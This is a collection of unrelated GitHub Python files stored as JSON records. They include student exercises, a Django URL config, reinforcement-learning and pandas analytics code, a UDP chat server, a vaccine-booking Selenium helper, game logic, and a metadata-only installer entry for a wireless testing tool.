\n\nprint(\"resultado=\"+str(Number_bin))\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej4/hito1_ej4_5d47c448ccd119641a03cb2e204eb67a.py","file_name":"hito1_ej4_5d47c448ccd119641a03cb2e204eb67a.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43731950785","text":"#!/usr/bin/env python\n#####################################\n# Installation module for airpwn-ng\n#####################################\n\n# AUTHOR OF MODULE NAME\nAUTHOR=\"Joao Pena Gil (Jack64)\"\n\n# DESCRIPTION OF THE MODULE\nDESCRIPTION=\"This module will install/update airpwn-ng, a tool for 802.11 packet injection & cookie grabbing\"\n\n# INSTALL TYPE GIT, SVN, FILE DOWNLOAD\n# OPTIONS = GIT, SVN, FILE\nINSTALL_TYPE=\"GIT\"\n\n# LOCATION OF THE FILE OR GIT/SVN REPOSITORY\nREPOSITORY_LOCATION=\"https://github.com/ICSec/airpwn-ng\"\n\n# WHERE DO YOU WANT TO INSTALL IT\nINSTALL_LOCATION=\"airpwn-ng\"\n\n# DEPENDS FOR DEBIAN INSTALLS\nDEBIAN=\"python-scapy\"\n\n# DEPENDS FOR FEDORA INSTALLS\nFEDORA=\"\"\n\n# COMMANDS TO RUN AFTER\nAFTER_COMMANDS=\"\"\n\nLAUNCHER=\"airpwn-ng\"\n","repo_name":"trustedsec/ptf","sub_path":"modules/wireless/airpwnng.py","file_name":"airpwnng.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":4859,"dataset":"github-code","pt":"77"} +{"seq_id":"12375486966","text":"'''\n Los resultados de las últimas elecciones al gobierno en el pueblo X han sido las siguientes:\n Distrito Candidato Candidato Candidato Candidato\n A B C D\n 12.1 194 48 206 45\n 13.2 180 20 320 16\n 14.3 221 90 140 20\n 15.4 432 50 821 14\n 16.5 820 61 946 18\n Escribir un programa que haga las siguientes tareas:\n  Imprimir la tabla anterior con cabeceras incluidas.\n  Calcular e imprimir el número total de votos recibidos por cada candidato y el\n porcentaje total de votos emitidos. Asimismo visualizar el candidato más votado.\n  Si algún candidato recibe más del 50 por 100 de los datos, el programa imprimirá\n un mensaje declarándolo ganador.\n  Si ningún candidato recibe más de 50 por 100 de los datos, el programa debe\n imprimir el nombre de los dos candidatos más votados, que serán los que pasen a\n la segunda ronda de las elecciones\n'''\n\nmatriz = [['Distrito', 'Candidato', 'Candidato', 'Candidato', 'Candidato'],\n [' ', 'A', 'B', 'C', 'D'],\n [12.1, 194, 48, 206, 45],\n [13.2, 180, 20, 320, 16],\n [14.3, 221, 90, 140, 20],\n [15.4, 432, 50, 821, 13],\n [16.5, 820, 61, 946, 18]]\n\nprint(matriz)\n\nx = 2\ny = 1\ncandidato_a = 0\ncandidato_b = 0\ncandidato_c = 0\ncandidato_d = 0\nfor x in range(2, len(matriz)):\n if y == 1:\n candidato_a += matriz[x][y]\n\ny += 1\n\nfor x in range(3, len(matriz)):\n if y == 2:\n candidato_b += matriz[x][y]\n\ny += 1\n\nfor x in range(4, len(matriz)):\n if y == 3:\n candidato_c += matriz[x][y]\n\ny += 1\n\nfor x in range(5, len(matriz)):\n if y == 4:\n candidato_d += matriz[x][y]\n\ntotal = candidato_a + candidato_b + candidato_c + candidato_d\n\nprint(candidato_a)\n\nporcentaje_a = (candidato_a * 100) / total\nporcentaje_b = (candidato_b * 100) / total\nporcentaje_c = (candidato_c * 100) / total\nporcentaje_d = (candidato_d * 100) / total\n\nprint(f'Los porcentajes de votos de cada candidatos son: A = {porcentaje_a}%, B = {porcentaje_b}, C = {porcentaje_c}%, D = {porcentaje_d}')\n\nif candidato_a > candidato_b and candidato_a > candidato_c and candidato_a > candidato_d:\n print(f'El candidato mas votado fue el candidato A con {candidato_a}')\nelif candidato_b > candidato_a and candidato_b > candidato_c and candidato_b > candidato_d:\n print(f'El candidato mas votado fue el candidato B con {candidato_b}')\nelif candidato_c > candidato_a and candidato_c > candidato_b and candidato_c > candidato_d:\n print(f'El candidato mas votado fue el candidato C con {candidato_c}')\nelif candidato_d > candidato_a and candidato_d > candidato_b and candidato_d > candidato_c:\n print(f'El candidato mas votado fue el candidato B con {candidato_b}')\n\nif porcentaje_a > 50:\n print('El ganador fue el A!!!')\nelif porcentaje_b > 50:\n print('El ganador fue el B!!!')\nelif porcentaje_c > 50:\n print('El ganador fue el C!!!')\nelif porcentaje_d > 50:\n print('El ganador fue el D!!!')\nelse:\n print('No gano nadie!')\n \n\ncandidatos_vector = [candidato_a, candidato_b, candidato_c, candidato_d]\ncandidatos_mayores = [candidatos_vector[2], candidatos_vector[3]]\n\nfor i in range(1, len(candidatos_vector)):\n for j in range(0, len(candidatos_vector) - i):\n if (candidatos_vector[j + 1] < candidatos_vector[j]):\n aux = candidatos_vector[j]\n candidatos_vector[j] = candidatos_vector[j+1]\n candidatos_vector[j+1] = aux\n\nprint('Pasan a la siguientes fases los siguientes candidatos:')\nif candidatos_vector[2] == candidato_a:\n print('Candidato A')\n\nif candidatos_vector[2] == candidato_b:\n print('Candidato B')\n\nif candidatos_vector[2] == candidato_c:\n print('Candidato C')\n\nif candidatos_vector[2] == candidato_d:\n print('Candidato D')\n\nif candidatos_vector[3] == candidato_a:\n print('Candidato A')\n\nif candidatos_vector[3] == candidato_b:\n print('Candidato B')\n\nif candidatos_vector[3] == candidato_c:\n print('Candidato C')\n\nif candidatos_vector[3] == candidato_d:\n print('Candidato D')","repo_name":"LucasLeone/tp4-algoritmos","sub_path":"m11.py","file_name":"m11.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11697130723","text":"import sys\nimport time\nimport Herm_Char\nplayer = Herm_Char.char = {\"lvl\" : 1,\n \"xp\" : 0,\n \"lvlnxt\" : 25}\nclass Ability():\n def level(self):\n nStr = 0\n nDex = 0\n nInt = 0\n while player[\"xp\"] >= player[\"lvlnxt\"]:\n player[\"lvl\"] += 1\n player[\"xp\"] = player[\"xp\"] - player[\"lvlnxt\"]\n player[\"lvlnxt\"] = round(player[\"lvlnxt\"] * 1.5)\n for i in \"\"\"What SKILL would you like to increase???\nIntellect(I)\nStrength(S)\nDexterity(D)\n\"\"\":\n sys.stdout.write(i)\n sys.stdout.flush()\n time.sleep(.05)\n skill_point = input(\"\").lower()\n if skill_point == \"i\":\n nInt += 1\n elif skill_point == \"s\":\n nStr += 1\n elif skill_point == \"d\":\n nDex += 1","repo_name":"KhajiitChief/Hello_World_Game","sub_path":"Skills.py","file_name":"Skills.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20794051737","text":"from django.urls import path\nfrom . import views\n\napp_name = 'basic_app'\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('relative/', views.relative, name='relative'),\n path('other/', views.other, name='other'),\n path('registration/', views.registration, name='registration'),\n path('login/', views.user_login, name='login'),\n path('logout/', views.user_logout, name='logout'),\n\n]","repo_name":"andrewtmarvin/django-deployment-example","sub_path":"learning_templates/basic_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12458965621","text":"import numpy as np\r\n\r\nfrom tensorflow.keras.layers import Concatenate\r\nfrom os.path import splitext\r\nfrom simagent.twoagentsagent import TwoAgentsAgent\r\n\r\nclass SimultaneousAgent(TwoAgentsAgent):\r\n def __init__(self, agents):\r\n self.agents = agents\r\n self.n = len(agents)\r\n self.compiled = False\r\n self.m_names = []\r\n self._training = False\r\n self._step = 0\r\n self.agents_combinations = []\r\n self.current_fight_number = -1\r\n self.current_fight = []\r\n self.player = 0\r\n self.player_one = 0\r\n self.game_step = 0\r\n super(SimultaneousAgent, self).__init__()\r\n\r\n self.current_game_number = -1 # Used to append steps to proper games.\r\n self.current_game = [], []\r\n self.agents_games_log = []\r\n\r\n # Creating list with proper structure.\r\n for i in range(self.n):\r\n self.agents_games_log.append([])\r\n\r\n # Creating list with proper structure.\r\n for i in range(self.n):\r\n case = []\r\n for j in range(self.n):\r\n case.append([])\r\n self.rewards_history.append(case)\r\n\r\n @property\r\n def training(self):\r\n return self._training\r\n\r\n @training.setter\r\n def training(self,t):\r\n self._training = t\r\n for agent in self.agents:\r\n agent.training = t\r\n\r\n @property\r\n def step(self):\r\n return self._step\r\n\r\n @step.setter\r\n def step(self,s):\r\n self._step = s\r\n for agent in self.agents:\r\n agent.step = s\r\n\r\n def reset_states(self):\r\n for agent in self.agents:\r\n agent.reset_states()\r\n\r\n def forward(self, observation):\r\n \"\"\"Takes the an observation from the environment and returns the action to be taken next.\r\n If the policy is implemented by a neural network, this corresponds to a forward (inference) pass.\r\n # Argument\r\n observation (object): The current observation from the environment.\r\n # Returns\r\n The next action to be executed in the environment.\r\n \"\"\"\r\n self.game_step = observation[2]\r\n if self.game_step == -1:\r\n if self.current_fight_number == len(self.agents_combinations)-1:\r\n self.current_fight_number = -1\r\n self.current_fight_number += 1\r\n\r\n # Print number of the pair playing right now / total number of pairs.\r\n # print(self.current_fight_number, \"/\", len(self.agents_combinations)-1)\r\n self.current_fight = self.agents_combinations[self.current_fight_number]\r\n self.player = self.current_fight[0]\r\n self.player_one = self.current_fight[1]\r\n\r\n ## print(\"#### AGENTS PLAYING:\",self.player, self.player_one)\r\n self.current_game[0].append([self.player, self.player_one])\r\n self.current_game[1].append([self.player_one, self.player])\r\n\r\n if self.current_fight_number == 0:\r\n self.current_game_number += 1\r\n\r\n current_players_actions = [self.agents[self.player].forward([observation[0],\r\n self.game_step,\r\n self.player_one,\r\n observation[3][1]\r\n ]),\r\n self.agents[self.player_one].forward([observation[1],\r\n self.game_step,\r\n self.player,\r\n observation[3][0]\r\n ])]\r\n\r\n if self.game_step != 19:\r\n self.current_game[0].append(current_players_actions[0])\r\n self.current_game[1].append(current_players_actions[1])\r\n\r\n return current_players_actions\r\n\r\n def backward(self, reward, terminal):\r\n \"\"\"Updates the agent after having executed the action returned by `forward`.\r\n If the policy is implemented by a neural network, this corresponds to a weight update using back-prop.\r\n # Argument\r\n reward (float): The observed reward after executing the action returned by `forward`.\r\n terminal (boolean): `True` if the new state of the environment is terminal.\r\n # Returns\r\n List of metrics values\r\n \"\"\"\r\n if self.game_step == 19:\r\n self.agents_games_log[self.player].append([self.current_game[0],\r\n self.current_game[1]])\r\n self.agents_games_log[self.player_one].append([self.current_game[1],\r\n self.current_game[0]])\r\n self.current_game = [], []\r\n\r\n return [self.agents[self.player].backward(reward[0], terminal),\r\n self.agents[self.player_one].backward(reward[1], terminal)]\r\n\r\n def compile(self, optimizer, metrics=[]):\r\n \"\"\"Compiles an agent and the underlaying models to be used for training and testing.\r\n # Arguments\r\n optimizer (`keras.optimizers.Optimizer` instance): The optimizer to be used during training.\r\n metrics (list of functions `lambda y_true, y_pred: metric`): The metrics to run during training.\r\n \"\"\"\r\n # Set optimizer and metrics (plus other 'compile' things) for each agent.\r\n for i,agent in enumerate(self.agents):\r\n if not agent.compiled:\r\n agent.compile(optimizer[i],metrics[i])\r\n\r\n # Create agents combinations.\r\n combinations = []\r\n for i in range(len(self.agents)):\r\n for j in range(len(self.agents)):\r\n if i != j:\r\n combinations.append([i,j])\r\n\r\n for i in range(len(combinations)):\r\n combinations[i].sort()\r\n combinations.sort()\r\n\r\n for i in range(len(combinations)):\r\n if i % 2 == 0:\r\n self.agents_combinations.append(combinations[i])\r\n\r\n # Add each agent's metrics names to self.m_names.\r\n for i in range(len(self.agents)):\r\n self.m_names.append(self.agents[i].metrics_names)\r\n\r\n self.compiled = True\r\n\r\n def load_weights(self, filepath):\r\n \"\"\"Loads the weights of an agent from an HDF5 file.\r\n # Arguments\r\n filepath (str): The path to the HDF5 file.\r\n \"\"\"\r\n fbase, fext = splitext(filepath)\r\n for i, agent in enumerate(self.agents):\r\n if i <= 1:\r\n agent.load_weights('%s%i%s' % (fbase,i,fext))\r\n\r\n def save_weights(self, filepath, overwrite=False):\r\n \"\"\"Saves the weights of an agent as an HDF5 file.\r\n # Arguments\r\n filepath (str): The path to where the weights should be saved.\r\n overwrite (boolean): If `False` and `filepath` already exists, raises an error.\r\n \"\"\"\r\n fbase, fext = splitext(filepath)\r\n for i, agent in enumerate(self.agents):\r\n if i <= 1:\r\n agent.save_weights('%s%i%s' % (fbase,i,fext), overwrite)\r\n\r\n @property\r\n def layers(self):\r\n \"\"\"Returns all layers of the underlying model(s).\r\n If the concrete implementation uses multiple internal models,\r\n this method returns them in a concatenated list.\r\n # Returns\r\n A list of the model's layers\r\n \"\"\"\r\n return [ layer for agent in self.agents\r\n for layer in agent.layers() ]\r\n\r\n @property\r\n def metrics_names(self):\r\n \"\"\"The human-readable names of the agent's metrics. Must return as many names as there\r\n are metrics (see also `compile`).\r\n # Returns\r\n A list of metric's names (string)\r\n \"\"\"\r\n return [self.m_names[0], self.m_names[1]]\r\n\r\n def _on_train_begin(self):\r\n \"\"\"Callback that is called before training begins.\"\r\n \"\"\"\r\n for agent in self.agents:\r\n agent._on_train_begin()\r\n\r\n def _on_train_end(self):\r\n \"\"\"Callback that is called after training ends.\"\r\n \"\"\"\r\n for agent in self.agents:\r\n agent._on_train_end()\r\n\r\n def _on_test_begin(self):\r\n \"\"\"Callback that is called before testing begins.\"\r\n \"\"\"\r\n for agent in self.agents:\r\n agent._on_test_begin()\r\n\r\n def _on_test_end(self):\r\n \"\"\"Callback that is called after testing ends.\"\r\n \"\"\"\r\n for agent in self.agents:\r\n agent._on_test_end()\r\n\r\n\r\n\r\n def get_agents_games_log(self):\r\n return self.agents_games_log\r\n\r\n def get_n(self):\r\n return self.n\r\n\r\n def forward_test(self, observation, player0, player1, agent_index, agent_one_index):\r\n self.player = player0\r\n self.player_one = player1\r\n self.game_step = observation[2]\r\n\r\n if self.game_step == -1:\r\n ## print(\"### HIVES PLAYING:\", self.player, self.player_one)\r\n ## print(\"### AGENTS PLAYING:\", agent_index, agent_one_index)\r\n\r\n if self.current_fight_number == 0:\r\n self.current_game_number += 1\r\n\r\n # [my_action, enemy_action, step, my_hive, enemy_hive, my_reward, my_index, enemy_index]\r\n current_players_actions = [self.agents[self.player].forward([self.game_step,\r\n observation[1],\r\n observation[0],\r\n self.player,\r\n self.player_one,\r\n observation[3][0],\r\n agent_index,\r\n agent_one_index\r\n ]),\r\n self.agents[self.player_one].forward([self.game_step,\r\n observation[0],\r\n observation[1],\r\n self.player_one,\r\n self.player,\r\n observation[3][1],\r\n agent_one_index,\r\n agent_index\r\n ])]\r\n\r\n return current_players_actions\r\n\r\n\r\n def backward_test(self, reward, terminal):\r\n \"\"\"Updates the agent after having executed the action returned by `forward`.\r\n If the policy is implemented by a neural network, this corresponds to a weight update using back-prop.\r\n # Argument\r\n reward (float): The observed reward after executing the action returned by `forward`.\r\n terminal (boolean): `True` if the new state of the environment is terminal.\r\n # Returns\r\n List of metrics values\r\n \"\"\"\r\n if self.game_step == 19:\r\n self.agents_games_log[self.player].append([self.current_game[0],\r\n self.current_game[1]])\r\n self.agents_games_log[self.player_one].append([self.current_game[1],\r\n self.current_game[0]])\r\n self.current_game = [], []\r\n\r\n return [self.agents[self.player].backward(reward[0],terminal),\r\n self.agents[self.player_one].backward(reward[1],terminal)]\r\n\r\n def get_rewards_history(self):\r\n return self.rewards_history\r\n","repo_name":"BSski/HIVE","sub_path":"simagent/simultaneous.py","file_name":"simultaneous.py","file_ext":"py","file_size_in_byte":12229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44519606885","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*\n\"\"\"\n.. $Id$\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nfrom datetime import date\nfrom datetime import datetime\nfrom datetime import timedelta\n\nimport pandas as pd\n\nfrom nti.analytics_pandas.queries import QueryUsers\n\nfrom nti.analytics_pandas.utils import get_values_of_series_categorical_index_\n\nlogger = __import__('logging').getLogger(__name__)\n\n\ndef first_date_of_the_week(year, week):\n ret = datetime.strptime('%04d-%02d-2' % (year, week), '%Y-%W-%w')\n if date(year, 1, 4).isoweekday() > 4:\n ret -= timedelta(days=7)\n return ret\n\n\ndef add_timestamp_period_(df, period_format=u'%Y-%m-%d', time_period='daily'):\n if 'timestamp' in df.columns:\n if time_period == 'weekly':\n df['timestamp_period'] = df['timestamp'].apply(\n lambda x: first_date_of_the_week(x.year, x.week)\n )\n else:\n df['timestamp_period'] = df['timestamp'].apply(\n lambda x: x.strftime(period_format)\n )\n return df\n\n\ndef explore_number_of_events_based_timestamp_date_(df):\n if len(df.index) > 0:\n grouped = df.groupby('timestamp_period')\n df.reset_index(inplace=True)\n events_df = grouped.aggregate(pd.Series.nunique)\n return events_df\n\n\ndef explore_unique_users_based_timestamp_date_(df):\n if len(df.index) > 0:\n grouped = df.groupby('timestamp_period')\n unique_users_per_period_df = grouped.aggregate(\n {'user_id': pd.Series.nunique}\n )\n unique_users_per_period_df.rename(columns={'user_id': 'total_unique_users'},\n inplace=True)\n return unique_users_per_period_df\n\n\ndef explore_ratio_of_events_over_unique_users_based_timestamp_date_(events_df,\n events_df_column_name,\n unique_users_df):\n if events_df is not None and unique_users_df is not None:\n merge_df = events_df.join(unique_users_df)\n merge_df['ratio'] = merge_df[events_df_column_name] / merge_df['total_unique_users']\n return merge_df\n\n\ndef analyze_types_(df, group_by_items, agg_columns=None):\n if 'device_type' in group_by_items and 'device_type' in df.columns:\n df['device_type'] = df['device_type'].astype(str)\n df['device_type'] = df['device_type'].replace('nan', 'Unknown')\n\n if 'enrollment_type' in group_by_items and 'enrollment_type' in df.columns:\n df['enrollment_type'] = df['enrollment_type'].astype(str)\n df['enrollment_type'] = df['enrollment_type'].replace('nan', 'Unknown')\n\n if len(df.index) > 0:\n check = set(group_by_items) & set(df.columns)\n if len(check) == len(group_by_items):\n grouped = df.groupby(group_by_items)\n if agg_columns is not None:\n events_df = grouped.aggregate(agg_columns)\n else:\n events_df = grouped.aggregate(pd.Series.nunique)\n return events_df\n\n\ndef get_most_active_users_(df, session, max_rank_number=10):\n if df is None or df.empty:\n return\n most_active_user_id = df.groupby('user_id').size() \\\n \t\t\t\t\t.sort_values(ascending=False)[:max_rank_number]\n most_active_user_id_df = most_active_user_id.to_frame(\n name='number_of_activities'\n )\n most_active_user_id_df.reset_index(level=0, inplace=True)\n\n users_id = get_values_of_series_categorical_index_(\n most_active_user_id\n ).tolist()\n\n most_active_user_df = QueryUsers(session).get_username_filter_by_user_id(users_id)\n most_active_user_df = most_active_user_df.merge(most_active_user_id_df)\n\n most_active_user_df.sort_values(by='number_of_activities',\n\t\t\t\t\t\t\t\t\tascending=[0],\n\t\t\t\t\t\t\t\t\tinplace=True)\n most_active_user_df.reset_index(inplace=True, drop=True)\n return most_active_user_df\n\n\ndef generate_pivot_table_(df, index_columns, values_columns, agg_funcs):\n table = pd.pivot_table(df,\n index=index_columns,\n values=values_columns,\n aggfunc=agg_funcs, fill_value=0)\n return table\n\n\ndef reset_dataframe_(df):\n df.reset_index(inplace=True)\n df['timestamp_period'] = pd.to_datetime(df['timestamp_period'])\n return df\n\n\ndef get_data(table,\n with_context_name=True,\n with_device_type=True,\n with_enrollment_type=True):\n data = {}\n if not table.dataframe.empty:\n df_by_timestamp = table.analyze_events()\n df_by_timestamp = reset_dataframe_(df_by_timestamp)\n data['df_by_timestamp'] = df_by_timestamp\n if with_context_name:\n df_per_course_sections = table.analyze_events_per_course_sections()\n df_per_course_sections = reset_dataframe_(df_per_course_sections)\n data['df_per_course_sections'] = df_per_course_sections\n if with_device_type and 'device_type' in table.dataframe.columns:\n if hasattr(table, 'analyze_events_per_device_types'):\n df_per_device_types = table.analyze_events_per_device_types()\n else:\n df_per_device_types = table.analyze_device_types()\n df_per_device_types = reset_dataframe_(df_per_device_types)\n data['df_per_device_types'] = df_per_device_types\n if with_enrollment_type and 'enrollment_type' in table.dataframe.columns:\n if hasattr(table, 'analyze_events_per_enrollment_types'):\n df_per_enrollment_type = table.analyze_events_per_enrollment_types()\n else:\n df_per_enrollment_type = table.analyze_enrollment_types()\n df_per_enrollment_type = reset_dataframe_(df_per_enrollment_type)\n data['df_per_enrollment_type'] = df_per_enrollment_type\n return data\n","repo_name":"OpenNTI/nti.analytics_pandas","sub_path":"src/nti/analytics_pandas/analysis/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8195767657","text":"\ndef roman_to_int(input):\n if type(input) != type(\"\"):\n raise TypeError( \"expected string, got %s\" % type(input))\n input = input.upper()\n nums = ['M', 'D', 'C', 'L', 'X', 'V', 'I']\n ints = [1000, 500, 100, 50, 10, 5, 1]\n places = []\n for c in input:\n if not c in nums:\n raise ValueError(\"input is not a valid roman numeral: %s\" % input)\n for i in range(len(input)):\n c = input[i]\n value = ints[nums.index(c)]\n # If the next place holds a larger number, this value is negative.\n try:\n nextvalue = ints[nums.index(input[i +1])]\n if nextvalue > value:\n value *= -1\n except IndexError:\n # there is no next place.\n pass\n places.append(value)\n sum = 0\n for n in places: sum += n\n return sum\n","repo_name":"perrymant/CodeWarsKataStuff","sub_path":"CodeWarsKataStuff/Roman to int.py","file_name":"Roman to int.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21954332177","text":"import socket\n\ndef encrypt(text,s):\n result = \"\"\n # transverse the plain text\n for i in range(len(text)):\n char = text[i]\n # Encrypt uppercase characters in plain text\n \n if (char.isupper()):\n result += chr((ord(char) + s-65) % 26 + 65)\n # Encrypt lowercase characters in plain text\n else:\n result += chr((ord(char) + s - 97) % 26 + 97)\n return result\n#check the above function\n\n\n\n\nlocalIP = \"127.0.0.1\"\n\nlocalPort = 20001\n\nbufferSize = 1024\n \n\n# Create a datagram socket\n\nUDPServerSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n\n \n\n# Bind to address and ip\n\nUDPServerSocket.bind((localIP, localPort))\n\n \n\nprint(\"UDP server up and listening\")\n\n \n\n# Listen for incoming datagrams\n\nwhile(True):\n\n bytesAddressPair = UDPServerSocket.recvfrom(bufferSize)\n\n message = bytesAddressPair[0]\n\n address = bytesAddressPair[1]\n\n\n\n clientMsg = \"{}\".format(message)\n #clientIP = \"Client IP Address:{}\".format(address)\n \n print(\"client: \"+ clientMsg[2:-1])\n msg= input()\n\n if(msg==\"BYE\"):\n sock.close()\n else:\n bytesToSend= str.encode(msg)\n #encrpt(bytesToSend,4)\n UDPServerSocket.sendto(bytesToSend, address)\n # Sending a reply to client\n\n ","repo_name":"normal-crayon/Py-sockets","sub_path":"server2.py","file_name":"server2.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8655047378","text":"import sys\nsys.path.append('..')\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport main as mainScript\n# XPATH DOSAGE\ndosage_amount_xpath = '//h1[@class=\"appointmentTypeSelectionstyles__TitleContainer-sc-clkvs7-3 cBbZEX\"]'\n\n# Stores the vaccination name and the web element\nvax_elem_dict = {}\n\n# Error handling method - TBC \ndef no_elem_found():\n print(\"No vaccination elements were found on the page\")\n\n\n# Finding the elements using XPATH when they load on page\ndef find_vaccination_elements(driver, delay):\n try:\n vax_elements = WebDriverWait(driver, delay).until(\n EC.visibility_of_all_elements_located((By.XPATH, dosage_amount_xpath)))\n except NoSuchElementException:\n no_elem_found()\n else:\n update_elem_dict(vax_elements)\n\n\n# Function that sets the vaccination name(key) and element scraped (value) based on vaccination name scraped\ndef update_elem_dict(elements):\n for elem in elements:\n vax_elem_dict[elem.text] = elem\n\n\n# Matches user selected vax with a vaccine on the page\ndef match_user_selected_vax():\n user_in = \"Pfizer Dose 2\"\n elem_key_list = [*vax_elem_dict]\n selected_vax = \"\"\n\n for key in elem_key_list:\n\n if user_in in key:\n selected_vax = key\n\n return selected_vax\n\n# Matches the user selected vax element and clicks the element \ndef click_selected_vax():\n selected_vaccine = match_user_selected_vax()\n\n vax_elem_dict[selected_vaccine].click()\n\n# Main run-time -> Calls all other methods \ndef select_vaccine_script(driver):\n delay = 10\n\n find_vaccination_elements(driver, delay)\n\n click_selected_vax()\n\n # Fetch and click dynamically generated continue button\n WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.TAG_NAME, \"button\"))).click()\n\n\n# Returns the amount of additional vaccination form fills required\ndef get_dose_number():\n\n selected_vax = match_user_selected_vax()\n\n if 'Dose 1' in selected_vax:\n return 0\n elif 'Dose 2' in selected_vax:\n return 1\n else:\n return 2\n\n\n","repo_name":"Autovaxx/Backend","sub_path":"booking_script/shoppers/vaccination_select.py","file_name":"vaccination_select.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28218470619","text":"\"\"\"Add 'IRB_ONLINE_STATUS' column to IRBInfo table\n\nRevision ID: fcc193c49110\nRevises: d6627c76ed75\nCreate Date: 2022-04-07 16:00:36.260246\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fcc193c49110'\ndown_revision = 'd6627c76ed75'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column('irb_info', sa.Column('IRB_ONLINE_STATUS', sa.String(), nullable=True))\n\n\ndef downgrade():\n op.drop_column('irb_info', 'IRB_ONLINE_STATUS')\n","repo_name":"sartography/protocol-builder-mock","sub_path":"migrations/versions/fcc193c49110_add_irb_online_status_column_to_irbinfo_.py","file_name":"fcc193c49110_add_irb_online_status_column_to_irbinfo_.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"218144832","text":"# Functions - Lines of code to accomplish a task\n# Code MUST be indented, to be part of the function!\n# Named in lower case, 2 or more words = use underscore!\n\n#def = function\ndef say_hi():\n print(\"Hello User\")\n\n\n# Execute the function = Calling the function\nprint(\"Top\")\nsay_hi()\nprint(\"Bottom\")\n\n# Parameter = information given to the function\n\ndef say_hi1(name):\n print(\"Hello \" + name )\n\n\n# Execute the function = Calling the function\nsay_hi1(\"Ryan\")\nsay_hi1(\"Steve\")\nsay_hi1(\"Mike\")\n\ndef say_hi2(name, age):\n print(\"Hello \" + name + \", you are \" + str(age))\n\nsay_hi2(\"Ryan\", \"34\")\nsay_hi2(\"Steve\", \"70\")\nsay_hi2(\"Mike\", \"60\")\n","repo_name":"ryanthemanr0x/Python","sub_path":"Giraffe/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38624194927","text":"import base\n\nclass Burrow(base.Entity):\n\tdef __init__(self):\n\t\tsuper(BurrowStatus,self).__init__()\n\n\tdef do_turn(self):\n\t\tpass\n\n\n# TODO- implement Stun(turns_to_be_stunned)\n\nclass Healing(base.Entity):\n\tdef __init__(self):\n\t\tsuper(Healing,self).__init__()\n\t\tself.turns = 5\n\n\tdef do_turn(self,options):\n\t\tif self.turns > 0:\n\t\t\thp_restored = self.owner.max_health * .10\n\t\t\tself.owner.health += hp_restored\n\t\t\tif self.owner.health > self.owner.max_health:\n\t\t\t\tself.owner.health = self.owner.max_health\n\t\t\tbase.put(\"[STATUS] healed %s for %d\" % (self.owner.name, hp_restored))\n\t\t\tself.turns -= 1\n\t\telse:\n\t\t\tself.owner.statuses.remove(self)\n\n\n\nclass Stun(base.Entity):\n\tdef __init__(self,turns):\n\t\tsuper(Stun,self).__init__()\n\t\tself.turns = turns\n\n\tdef do_turn(self,options):\n\t\tif self.turns > 0:\n\t\t\tbase.put('[STATUS] %s is stunned, and cannot move for another %d turns' % (self.owner.to_str(),self.turns))\n\t\t\tself.owner.action_points = 0\n\t\t\tself.turns -= 1\n\t\telse:\n\t\t\tself.owner.statuses.remove(self)\n\n\nclass Poison(base.Entity):\n\tdef __init__(self,turns,damage):\n\t\tsuper(Poison,self).__init__()\n\t\tself.turns = turns\n\t\tself.damage = damage\n\t\tself.name = 'poison'\n\n\tdef do_turn(self,option):\n\t\tif self.turns > 0:\n\t\t\tself.owner.health -= self.damage\n\t\t\tbase.put('[STATUS] %s takes %f poison damage' % (self.owner.name,self.damage))\n\t\t\tself.turns -= 1\n\t\t\tself.damage *= 1.2\n\t\telse:\n\t\t\tself.owner.statuses.remove(self)\n\n\tdef to_str(self):\n\t\treturn self.name\n\nclass Bleeding(base.Entity):\n\tdef __init__(self,turns,damage):\n\t\tsuper(Bleeding,self).__init__()\n\t\tself.turns = turns\n\t\tself.damage = damage\n\t\tself.name = 'bleeding'\n\n\tdef do_turn(self,option):\n\t\tif self.turns > 0:\n\t\t\tself.owner.health -= self.damage\n\t\t\tself.damage /=2\n\t\t\tbase.put('[STATUS] %s takes %f bleed damage' % (self.owner.name,self.damage))\n\t\t\tself.turns -= 1\n\t\telse:\n\t\t\tself.owner.statuses.remove(self)\n\n\tdef to_str(self):\n\t\treturn self.name\n\nclass Maim(base.Entity):\n\tdef 